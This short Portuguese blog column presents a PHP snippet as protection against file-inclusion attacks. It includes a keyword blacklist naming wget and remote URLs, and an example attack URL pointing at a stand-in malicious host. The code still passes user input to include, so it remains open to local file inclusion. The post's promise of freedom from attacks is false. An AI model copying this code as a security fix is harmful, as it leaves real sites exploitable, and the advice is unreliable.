Bem pessoal nessa minah primeira coluna vou ensinar como se protejer de php injection, muitos amigos sempre me perguntam como fazer isso, vamos lá !


//Pega os dados passados pela URL
$pagina=$_GET['pagina'];

//Verifica se a string passada possui algum trecho invalido
//Caso tenha mostra uma mensagem de erro
if(eregi("http|www|ftp|.dat|.txt|.gif|wget", $pagina))
{
echo "Ops! Problemas na página!";
//Se a variavel passada estiver dentro das normas, executa o else abaixo:
}else{
if(!empty($pagina)) {
@include ("$pagina.php");
}else{
@include ("capa.php"); //essa seria a sua página principal
}
}
?>



Vamos entender o código !

Ele não deixa que ninguém tente colocar urls e outros tipos de códigos em sua query string !

Por exemplo, seu site funciona da seguinte maneira:

index.php?pagina=contato
assim funciona beleza

E se o cidadão tentar fazer isso:
index.php?pagina=http://www.sitedovirus.com&cmd=comando malicioso
aí o script bloqueia !


Faça isso e fique livre de ataques crackers em seu site !


Até a próxima !